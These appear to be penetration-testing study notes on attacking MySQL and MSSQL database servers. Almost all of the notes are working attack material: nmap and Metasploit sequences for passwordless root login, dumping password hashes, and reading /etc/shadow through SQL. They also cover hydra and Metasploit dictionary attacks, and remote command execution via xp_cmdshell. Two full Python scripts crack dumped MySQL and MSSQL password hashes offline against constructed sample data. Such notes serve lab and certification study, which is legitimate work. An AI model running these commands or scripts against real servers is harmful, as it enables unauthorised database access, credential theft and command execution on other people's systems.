
SQL Lesson

MySQL

# Ways to enumerate a MySQL server
nmap <Target>
nmap <Target> -sV -p 3306
# Try to log in as root with no password
mysql -h <Target> -u root
show databases;
# Switch to a database
use <DB>;
# Number of rows in a table
select count(*) from authors;
select * from authors;
# Full list of client commands that can be run
help
msfconsole
use auxiliary/scanner/mysql/mysql_writable_dirs
options
set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt
set rhosts <Target>
# Set verbose to false so only the results (writable directories) are printed
set verbose false
# PASSWORD is listed under the advanced options of this module; set it to empty for a passwordless root
advanced
set password ""
options
run
# Hash dump scan
# Lists the users with their corresponding password hash
msfconsole
use auxiliary/scanner/mysql/mysql_hashdump
options
set rhosts <Target>
set username root
# Empty password
set password ""
options
exploit
mysql -h <Target> -u root
# Files can be read through SQL queries (needs the FILE privilege and a secure_file_priv setting that allows the path)
select load_file("/etc/shadow");
# Identify users with an empty password
nmap <Target> -sV -p 3306 --script=mysql-empty-password
# More information about the server
nmap <Target> -sV -p 3306 --script=mysql-info
# In the mysql-info output, check whether the capabilities include "InteractiveClient", which allows access through the interactive MySQL client.
# List the users defined on the MySQL server
nmap <Target> -sV -p 3306 --script=mysql-users --script-args="mysqluser='root',mysqlpass=''"
# List databases
nmap <Target> -sV -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''"
# List variables - the most useful one is "datadir", the directory where the data files are stored
nmap <Target> -sV -p 3306 --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''"
# Audit the MySQL configuration against the CIS audit file shipped with Nmap
nmap <Target> -sV -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"
# Dump users and hashes
nmap <Target> -sV -p 3306 --script=mysql-dump-hashes --script-args="username='root',password=''"
# Queries can also be run through nmap
nmap <Target> -sV -p 3306 --script=mysql-query --script-args="query='select count(*) from books.authors;',username='root',password=''"

MySQL Dictionary Attack

msfconsole
use auxiliary/scanner/mysql/mysql_login
set rhosts <Target>
# Use a password file
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
# Set verbose to false so only successful logins are printed
set verbose false
# Stop as soon as a valid login is found
set stop_on_success true
# Set the username
set username root
run
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <Target> mysql
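The online dictionary attack above (mysql_login / hydra) and the hash dump from mysql_hashdump / mysql-dump-hashes are two sides of the same weakness. The script below is an added example, not part of these notes or of Metasploit: it reproduces the mysql_native_password hash format and the handshake scramble, and shows that the server only ever holds SHA1(SHA1(password)), so a dumped hash is enough to test candidate passwords offline without touching the service again. The loot lines and wordlist are constructed for the demo; the root entry uses the well-known hash of "password".

```python
import hashlib
from typing import Dict, Iterable


def mysql_native_hash(password: str) -> str:
    """Hash stored in mysql.user for mysql_native_password (MySQL 4.1+):
    '*' followed by the uppercase hex of SHA1(SHA1(password)).
    This is the value mysql_hashdump / mysql-dump-hashes print next to each user."""
    stage1 = hashlib.sha1(password.encode("utf-8")).digest()
    stage2 = hashlib.sha1(stage1).hexdigest().upper()
    return "*" + stage2


def client_token(password: str, salt: bytes) -> bytes:
    """Scramble the client sends in the handshake:
    SHA1(pw) XOR SHA1(salt || SHA1(SHA1(pw))), salt = 20 bytes from the server greeting."""
    stage1 = hashlib.sha1(password.encode("utf-8")).digest()
    stage2 = hashlib.sha1(stage1).digest()
    mix = hashlib.sha1(salt + stage2).digest()
    return bytes(a ^ b for a, b in zip(stage1, mix))


def server_verify(stored_hash: str, salt: bytes, token: bytes) -> bool:
    """Server-side check. The server only holds SHA1(SHA1(pw)); it unmasks SHA1(pw)
    from the token and re-hashes it. Consequence: whoever has the stored hash can
    verify candidate passwords offline, which is what crack_hashes() does."""
    stage2 = bytes.fromhex(stored_hash.lstrip("*"))
    mix = hashlib.sha1(salt + stage2).digest()
    stage1 = bytes(a ^ b for a, b in zip(token, mix))
    return hashlib.sha1(stage1).digest() == stage2


def parse_hashdump(lines: Iterable[str]) -> Dict[str, str]:
    """Turn 'user:hash' lines (the loot format written by mysql_hashdump) into a dict.
    Users with an empty hash (no password set) are kept so they can be reported."""
    users = {}
    for line in lines:
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, _, h = line.partition(":")
        users[user] = h.upper()
    return users


def crack_hashes(dumped: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Offline dictionary attack: hash each candidate once (the scheme is unsalted),
    then look every dumped hash up in that table. Empty hashes are returned as ''."""
    table = {mysql_native_hash(word): word for word in wordlist}
    found = {}
    for user, h in dumped.items():
        if h == "":
            found[user] = ""
        elif h in table:
            found[user] = table[h]
    return found


# Constructed sample loot (not real data), modelled on mysql_hashdump output.
SAMPLE_LOOT = [
    "root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19",  # PASSWORD('password')
    "filetest:",                                        # account with no password
    "backup:" + mysql_native_hash("winter2021"),        # generated here for the demo
]
WORDLIST = ["123456", "password", "toor", "winter2021"]


def demo() -> Dict[str, str]:
    """Crack the sample loot with the sample wordlist."""
    return crack_hashes(parse_hashdump(SAMPLE_LOOT), WORDLIST)


if __name__ == "__main__":
    for user, pw in demo().items():
        print(f"{user}: {pw!r}")
```

Once a password is recovered this way, log in with `mysql -h <Target> -u <user> -p` instead of re-running the online attack; the unsalted, double-SHA1 scheme is why MySQL 8 switched to caching_sha2_password, whose hashes this script does not handle.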

MSSQL Nmap Scripts

nmap <Target> -p1433 -sV
# Get SQL Server information
nmap <Target> -p1433 --script ms-sql-info
# Retrieve NTLM information (domain name, server name, etc.)
nmap <Target> -p1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433
# Brute force
nmap <Target> -p1433 --script ms-sql-brute --script-args userdb=/root/<list Users>.txt,passdb=<path>/wordlist/100-common-passwords.txt
# Test for empty passwords
nmap <Target> -p1433 --script ms-sql-empty-password
# Queries with valid credentials (admin/anamaria here)
nmap <Target> -p1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-query.query="SELECT * FROM master..syslogins" -oN output.txt
# List logins with their hashes
nmap <Target> -p1433 --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=anamaria
# Command execution through xp_cmdshell
nmap <Target> -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="ipconfig"
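The hashes returned by ms-sql-dump-hashes (and by the Metasploit mssql modules) are salted, so unlike the MySQL case they cannot be looked up in a precomputed table, but they can still be attacked offline. The script below is an added example, not part of these notes or of Nmap: it implements the two password_hash layouts found in sys.sql_logins (0x0100 with SHA-1 for SQL Server 2005 to 2008 R2, 0x0200 with SHA-512 for 2012 and later) and runs a dictionary attack against a constructed "login:hash" dump. The logins, salts and wordlist are made up for the demo; the SQL Server 2000 variant with a second uppercase-password digest is not covered.

```python
import hashlib
from typing import Dict, Iterable, Optional, Tuple

SHA1_VERSION = 0x0100    # SQL Server 2005 - 2008 R2
SHA512_VERSION = 0x0200  # SQL Server 2012 and later


def _digest(password: str, salt: bytes, version: int) -> bytes:
    """Digest part of the hash: H(UTF-16LE(password) || salt), H chosen by the version tag."""
    data = password.encode("utf-16-le") + salt
    if version == SHA1_VERSION:
        return hashlib.sha1(data).digest()
    if version == SHA512_VERSION:
        return hashlib.sha512(data).digest()
    raise ValueError(f"unknown hash version 0x{version:04X}")


def mssql_hash(password: str, salt: bytes, version: int = SHA512_VERSION) -> str:
    """Build a login hash in the format of sys.sql_logins.password_hash:
    0x || version(2) || salt(4) || digest, as printed by ms-sql-dump-hashes."""
    if len(salt) != 4:
        raise ValueError("salt must be 4 bytes")
    return "0x" + f"{version:04X}" + salt.hex().upper() + _digest(password, salt, version).hex().upper()


def split_hash(hash_str: str) -> Tuple[int, bytes, bytes]:
    """Split a dumped hash into (version, salt, digest)."""
    hex_part = hash_str[2:] if hash_str.lower().startswith("0x") else hash_str
    raw = bytes.fromhex(hex_part)
    return int.from_bytes(raw[:2], "big"), raw[2:6], raw[6:]


def crack_mssql(hash_str: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on one hash: the salt forces one digest per candidate per hash."""
    version, salt, digest = split_hash(hash_str)
    for word in wordlist:
        if _digest(word, salt, version) == digest:
            return word
    return None


# Constructed dump (not real data), modelled on the "login:hash" lines of ms-sql-dump-hashes.
SAMPLE_DUMP = [
    "sa:" + mssql_hash("P@ssw0rd", bytes.fromhex("11223344")),
    "admin:" + mssql_hash("anamaria", bytes.fromhex("DEADBEEF")),
    "legacy:" + mssql_hash("anamaria", bytes.fromhex("0A0B0C0D"), SHA1_VERSION),
]
WORDLIST = ["123456", "password", "anamaria", "P@ssw0rd"]


def demo() -> Dict[str, Optional[str]]:
    """Crack every login in the sample dump with the sample wordlist."""
    result = {}
    for line in SAMPLE_DUMP:
        login, _, h = line.partition(":")
        result[login] = crack_mssql(h, WORDLIST)
    return result


if __name__ == "__main__":
    for login, pw in demo().items():
        print(f"{login}: {pw!r}")
```

Note that the same salt is never shared between logins, so two accounts with the same password (admin and legacy above) produce different hashes and have to be cracked separately; for real dumps hand the 0x0100/0x0200 lines to hashcat rather than this loop.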

MSSQL Metasploit

nmap <Target> -p1433 -sV
# Get SQL Server information
nmap <Target> -p1433 --script ms-sql-info
msfconsole
use auxiliary/scanner/mssql/mssql_login
setg rhosts <Target>
# User list
set user_file /path/wordlist/common_users.txt
# Password list
set pass_file /path/wordlist/100-common-passwords.txt
# Set verbose to false so only valid logins are printed
set verbose false
show options
run
# The admin modules below authenticate with the credentials found by mssql_login
msfconsole
use auxiliary/admin/mssql/mssql_enum
options
set rhosts <Target>
set username <User>
set password <Password>
run
msfconsole
use auxiliary/admin/mssql/mssql_enum_sql_logins
options
set rhosts <Target>
set username <User>
set password <Password>
exploit
msfconsole
use auxiliary/admin/mssql/mssql_exec
options
set rhosts <Target>
set username <User>
set password <Password>
# Command to run through xp_cmdshell
set cmd whoami
run
msfconsole
use auxiliary/admin/mssql/mssql_enum_domain_accounts
options
set rhosts <Target>
set username <User>
set password <Password>
exploit
